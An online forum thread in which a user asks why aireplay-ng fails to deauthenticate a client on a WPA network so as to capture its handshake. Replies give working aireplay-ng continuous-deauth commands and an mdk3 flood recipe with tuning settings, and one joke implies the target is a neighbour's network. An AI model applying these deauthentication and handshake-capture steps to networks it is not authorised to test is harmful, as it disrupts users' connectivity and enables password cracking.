Results 1 to 7 of 7

Thread: Cant Deauth WPA STA for Handshake

  1. #1
    Just burned his ISO
    Join Date
    Dec 2007
    Posts
    10

    Default Cant Deauth WPA STA for Handshake

    I've been patient for several hours trying to deauth a station to get a handshake and have been unsuccessful. Maybe I'm not doing something correctly.

    The AP is WPA TKIP PSK and I have airodump-ng in a shell running exclusive to that AP channel, AP MAC and it shows a station connected.

    In another shell I run aireplay-ng -0 1 -a AP MAC -c STATION MAC <device>

    Several times I have sequenced aireplay-ng -0 10 and once -0 100

    I have tried aireplay -0 1 -a AP MAC <device> and see only 1 station.

    PWR Level is at 34, so I think I am getting signal to it.

    Any suggestions?

    I am using BT3b

    Thanks.

  2. #2
    Junior Member
    Join Date
    Jul 2007
    Posts
    47

    Default

    Hi,

    Remember that just because you are close enough to see the AP it does not always mean you are close enough to send data to a connected client.
    Removed by -=Xploitz=-
    We do NOT allow external links. We only allow "internal" links to our forums. See PM's.

  3. #3
    Senior Member imported_spankdidly's Avatar
    Join Date
    Feb 2006
    Posts
    1,031

    Default

    Yeah, try walking over to his house and sit on the front porch to do it, you will get a better signal that way.
    I felt like bending the bars back, and ripping out the window frames and eating them. yes, eating them! Leaping, leaping, leaping! Colonics for everyone! All right! You dumb*sses. I'm a mental patient. I'm *supposed* to act out!

  4. #4
    Just burned his ISO
    Join Date
    Dec 2007
    Posts
    10

    Default

    Then eventually the station would need to re-authorize, correct? For some reason or another and if I was monitiring I'd get the handshake, correct?

    I'm using an Alpha 1/2 watt device. I think i should be able to get to the station...

  5. #5

    Default

    funny, cause I can't auth with the wpa AT HOME!

  6. #6
    Junior Member
    Join Date
    Feb 2006
    Posts
    75

    Default

    @ attitude,

    Try running aireplay-ng -0 0 -a AP MAC -c STATION MAC <device>

    That should continuously deauth and leave it running until you see you have a handshake in airodump. That's always worked for me at least. Also like harry said being close doesn't always mean you will be successful. I've been distant before with a very low power level and the weirdest thing... my usb optical mouse when it was positioned just a certain way close to my wireless card it somehow made injection work. If I moved it away from my card injection stopped, but if I moved it closer and positoned it a certain way it worked just fine

    Hope that helps some.

  7. #7
    Senior Member shamanvirtuel's Avatar
    Join Date
    Mar 2010
    Location
    Somewhere in the "Ex" human right country
    Posts
    2,988

    Default

    i prefer a more tricky but effective way

    create blacklist file containing mac of victim

    run a mdk3 deauth / amok flood

    adjust delay to 1

    adjust packet/burst to 500

    adjust speed to 1024

    before launch that try to lower your rate as 1M , in order to get more client when scanning

    this way , it's a continuous deauth EACH TIME THE CLIENT REQUEST A SINGLE BIT OF TRAFFIC

    so you get for sure the handshake but need more work(little)

    this function will be available in ezpawn and is available in charon, my guis which hold some mdk3 functions (charon holds all)
    Watch your back, your packetz will belong to me soon... xD

    BackTrack :
    Giving Machine Guns to Monkeys since 2006

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •